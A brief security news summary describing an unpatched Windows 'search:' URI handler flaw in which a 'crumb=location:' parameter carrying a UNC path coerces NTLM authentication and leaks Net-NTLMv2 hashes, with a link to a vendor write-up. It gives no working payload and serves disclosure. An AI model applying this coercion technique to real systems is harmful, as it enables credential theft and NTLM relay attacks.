The article discusses a vulnerability in the Windows `search:` URI handler that leads to the leakage of Net-NTLMv2 password hashes. The issue stems from improper handling of parameters (e.g., `crumb=location:`), which allows passing a UNC path to a remote SMB resource. As a result, the system automatically initiates NTLM authentication to an attacker-controlled server, exposing the user's credential hash. The vulnerability is conceptually similar to a previously patched issue ([CVE-2026-33829](https://dbugs.ptsecurity.com/vulnerability/PT-2026-32887)), but in this case, no CVE or official patch is available.

Once the hash is leaked, an attacker can use it for NTLM relay attacks or further compromise of the infrastructure. A key aspect of this vulnerability is that it does not require code execution on the target system and can be integrated into coercion attack chains, expanding the attack surface through standard Windows URI handler mechanisms.

📎 Article: https://www.huntress.com/blog/unpatched-ntlm-leak-windows-search-uri-handler

NTLM Leak via Windows Search URI Handler